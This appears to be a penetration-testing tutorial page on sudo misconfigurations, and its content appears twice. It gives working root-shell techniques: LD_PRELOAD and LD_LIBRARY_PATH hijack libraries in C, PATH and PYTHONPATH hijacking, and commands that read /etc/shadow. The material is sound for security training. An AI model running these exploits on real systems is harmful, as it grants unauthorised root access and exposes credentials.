Sudo Misconfigurations

Theory

On this page, we speak about specific SUDO misconfigurations that can be leveraged to subvert sudo's intended functionality and elevate our privileges.

Practice

NOPASSWD

The following sudo configuration allow an user to execute some command with another user's privileges without knowing the password.

$ sudo -l

User demo may run the following commands on crashlab:
    (root) NOPASSWD: /usr/bin/vim

If you can run a binary with sudo rights, you may want to have look at GTFOBins, a curated list of Unix binaries that can be exploited to bypass local security restrictions. In this case with vim, we can spawn a shell with following commands:

sudo -u root vim -c '!sh'

LD_PRELOAD

LD_PRELOAD is an optional environmental variable containing one or more paths to shared libraries, or shared objects, that the loader will load before any other shared library including the C runtime library (libc.so) This is called preloading a library.

If env_keep+=LD_PRELOAD is explicitly defined in the sudo -l output and you can call some command with sudo, you can escalate your privileges.

$ sudo -l

env_reset, env_keep+=LD_PRELOAD
User demo may run the following commands on crashlab:
    (root) NOPASSWD: /usr/bin/find

To exploit, we can write a shared library

//Saved as /tmp/privEsc.c
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>

void _init() {
    unsetenv("LD_PRELOAD");
    setgid(0);
    setuid(0);
    system("/bin/bash -p");
}

compile it

gcc -fPIC -shared -o something.so /tmp/privEsc.c -nostartfiles

Then run the sudo binary with LD_PRELOAD environement variable

#Use any command you can run with sudo
sudo LD_PRELOAD=./something.so <COMMAND>

#Example
sudo LD_PRELOAD=./something.so /usr/bin/find

LD_LIBRARY_PATH

the LD_LIBRARY_PATH env variable controls the path where libraries are going to be searched.

If env_keep+=LD_LIBRARY_PATH is explicitly defined in the sudo -l output and you can call some command with sudo, you can escalate your privileges.

$ sudo -l

env_reset, env_keep+=LD_LIBRARY_PATH
User demo may run the following commands on crashlab:
    (root) NOPASSWD: /usr/bin/find

To abuse it we can do as follow

First, print the shared libraries of the sudo program. We will take /usr/bin/find as an example

$ ldd /usr/bin/find
        linux-vdso.so.1 (0x00007ffd627aa000)
        libselinux.so.1 => /lib/x86_64-linux-gnu/libselinux.so.1 (0x00007f6ebe9cc000)
        libm.so.6 => /lib/x86_64-linux-gnu/libm.so.6 (0x00007f6ebe8ed000)
        libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007f6ebe70c000)
        libpcre2-8.so.0 => /lib/x86_64-linux-gnu/libpcre2-8.so.0 (0x00007f6ebe672000)
        /lib64/ld-linux-x86-64.so.2 (0x00007f6ebea5f000)

Use one of the shared objects in the list and we will hijack it by creating a file with same name. For this demonstration, we will be targeting the libpcre2-8.so.0 file.

//Saved as /tmp/libpcre2-8.so.0.c
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>

void _init() {
    unsetenv("LD_LIBRARY_PATH");
    setresuid(0,0,0);
    system("/bin/bash -p");
}

compile it

gcc -o /tmp/libpcre2-8.so.0 -shared -fPIC /tmp/libpcre2-8.so.0.c

Then run the sudo binary with LD_LIBRARY_PATH environement variable

#Use any command you can run with sudo
sudo LD_LIBRARY_PATH=/tmp <COMMAND>

#Example
sudo LD_LIBRARY_PATH=/tmp /usr/bin/find

SETENV

This SETENVdirective allows the user to set an environment variable while executing something:

#Setenv on an arbitrary binary/script 
$ sudo -l

env_reset, env_file=/etc/sudoenv, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, listpw=always
User waldo may run the following commands on admirer:
    (ALL) SETENV: /opt/scripts/admin_tasks.sh


#Setenv on binary/script without the full command path
$ sudo -l

env_reset, env_file=/etc/sudoenv, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, listpw=always
User waldo may run the following commands on admirer:
    (ALL) SETENV: find

The previous example, based on HTB machine Admirer, was vulnerable to PYTHONPATH hijacking to load an arbitrary python library while executing the script as root:

#Sudo with modified PYTHONPATH
sudo PYTHONPATH=/dev/shm/ /opt/scripts/admin_tasks.sh

Or, you can set the PATH env variable if you can sudo on a binary without the full command path specified.

#Create a malicious find executable
echo '/bin/bash -p' > /tmp/find
chmod +x /tmp/find

#Sudo with modified PATH
sudo PATH=/tmp:$PATH find

Command Path Hijacking

If we can execute some command as root but env_reset and secure_path are set, we cannot override the PATH environment variable.

Instead we need to check if we have permission to write each path if a the sudo binary is specified without the full command path.

$ sudo -l

env_reset, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User demo may run the following commands on crashlab:
    (root) python /home/user/example.py

We need to check if we have permission to write each path.

ls -al /usr/local/
ls -al /usr/
ls -al /

Assume we can write an arbitrary binary file under /usr/sbin, we can create a payload in there. For example, we create a python binary under /usr/sbin.

echo '/bin/bash -p' > /usr/sbin/python
chmod +x /usr/sbin/python

Then execute the sudo command.

sudo python /home/user/example.py

Bypassing paths - Wildcard & Symlink

If we can execute some command as root and it contains a wildcard. We may use symlinks, path traversal or multiple arguments to exploit it.

$ sudo -l

env_reset, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User demo may run the following commands on crashlab:
    (root): /bin/less /var/log/*

We can exploit it by using path traversal technique

sudo less /var/log/../../etc/shadow

or we can exploit it by using symlinks technique

ln /etc/shadow /var/log/new
sudo less /var/log/new

Finally we can try to read 2 files at same time

sudo less /var/log/something /etc/shadow

References

Last updated 1 year ago

Was this helpful?

Practice

NOPASSWD

The following sudo configuration allow an user to execute some command with another user's privileges without knowing the password.

$ sudo -l

User demo may run the following commands on crashlab:
    (root) NOPASSWD: /usr/bin/vim

sudo -u root vim -c '!sh'

LD_PRELOAD

If env_keep+=LD_PRELOAD is explicitly defined in the sudo -l output and you can call some command with sudo, you can escalate your privileges.

$ sudo -l

env_reset, env_keep+=LD_PRELOAD
User demo may run the following commands on crashlab:
    (root) NOPASSWD: /usr/bin/find

To exploit, we can write a shared library

//Saved as /tmp/privEsc.c
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>

void _init() {
    unsetenv("LD_PRELOAD");
    setgid(0);
    setuid(0);
    system("/bin/bash -p");
}

compile it

gcc -fPIC -shared -o something.so /tmp/privEsc.c -nostartfiles

Then run the sudo binary with LD_PRELOAD environement variable

#Use any command you can run with sudo
sudo LD_PRELOAD=./something.so <COMMAND>

#Example
sudo LD_PRELOAD=./something.so /usr/bin/find

LD_LIBRARY_PATH

the LD_LIBRARY_PATH env variable controls the path where libraries are going to be searched.

If env_keep+=LD_LIBRARY_PATH is explicitly defined in the sudo -l output and you can call some command with sudo, you can escalate your privileges.

$ sudo -l

env_reset, env_keep+=LD_LIBRARY_PATH
User demo may run the following commands on crashlab:
    (root) NOPASSWD: /usr/bin/find

To abuse it we can do as follow

First, print the shared libraries of the sudo program. We will take /usr/bin/find as an example

$ ldd /usr/bin/find
        linux-vdso.so.1 (0x00007ffd627aa000)
        libselinux.so.1 => /lib/x86_64-linux-gnu/libselinux.so.1 (0x00007f6ebe9cc000)
        libm.so.6 => /lib/x86_64-linux-gnu/libm.so.6 (0x00007f6ebe8ed000)
        libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007f6ebe70c000)
        libpcre2-8.so.0 => /lib/x86_64-linux-gnu/libpcre2-8.so.0 (0x00007f6ebe672000)
        /lib64/ld-linux-x86-64.so.2 (0x00007f6ebea5f000)

Use one of the shared objects in the list and we will hijack it by creating a file with same name. For this demonstration, we will be targeting the libpcre2-8.so.0 file.

//Saved as /tmp/libpcre2-8.so.0.c
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>

void _init() {
    unsetenv("LD_LIBRARY_PATH");
    setresuid(0,0,0);
    system("/bin/bash -p");
}

compile it

gcc -o /tmp/libpcre2-8.so.0 -shared -fPIC /tmp/libpcre2-8.so.0.c

Then run the sudo binary with LD_LIBRARY_PATH environement variable

#Use any command you can run with sudo
sudo LD_LIBRARY_PATH=/tmp <COMMAND>

#Example
sudo LD_LIBRARY_PATH=/tmp /usr/bin/find

SETENV

This SETENVdirective allows the user to set an environment variable while executing something:

#Setenv on an arbitrary binary/script 
$ sudo -l

env_reset, env_file=/etc/sudoenv, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, listpw=always
User waldo may run the following commands on admirer:
    (ALL) SETENV: /opt/scripts/admin_tasks.sh


#Setenv on binary/script without the full command path
$ sudo -l

env_reset, env_file=/etc/sudoenv, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, listpw=always
User waldo may run the following commands on admirer:
    (ALL) SETENV: find

The previous example, based on HTB machine Admirer, was vulnerable to PYTHONPATH hijacking to load an arbitrary python library while executing the script as root:

#Sudo with modified PYTHONPATH
sudo PYTHONPATH=/dev/shm/ /opt/scripts/admin_tasks.sh

Or, you can set the PATH env variable if you can sudo on a binary without the full command path specified.

#Create a malicious find executable
echo '/bin/bash -p' > /tmp/find
chmod +x /tmp/find

#Sudo with modified PATH
sudo PATH=/tmp:$PATH find

Command Path Hijacking

If we can execute some command as root but env_reset and secure_path are set, we cannot override the PATH environment variable.

Instead we need to check if we have permission to write each path if a the sudo binary is specified without the full command path.

$ sudo -l

env_reset, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User demo may run the following commands on crashlab:
    (root) python /home/user/example.py

We need to check if we have permission to write each path.

ls -al /usr/local/
ls -al /usr/
ls -al /

Assume we can write an arbitrary binary file under /usr/sbin, we can create a payload in there. For example, we create a python binary under /usr/sbin.

echo '/bin/bash -p' > /usr/sbin/python
chmod +x /usr/sbin/python

Then execute the sudo command.

sudo python /home/user/example.py

Bypassing paths - Wildcard & Symlink

If we can execute some command as root and it contains a wildcard. We may use symlinks, path traversal or multiple arguments to exploit it.

$ sudo -l

env_reset, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User demo may run the following commands on crashlab:
    (root): /bin/less /var/log/*

We can exploit it by using path traversal technique

sudo less /var/log/../../etc/shadow

or we can exploit it by using symlinks technique

ln /etc/shadow /var/log/new
sudo less /var/log/new

Finally we can try to read 2 files at same time

sudo less /var/log/something /etc/shadow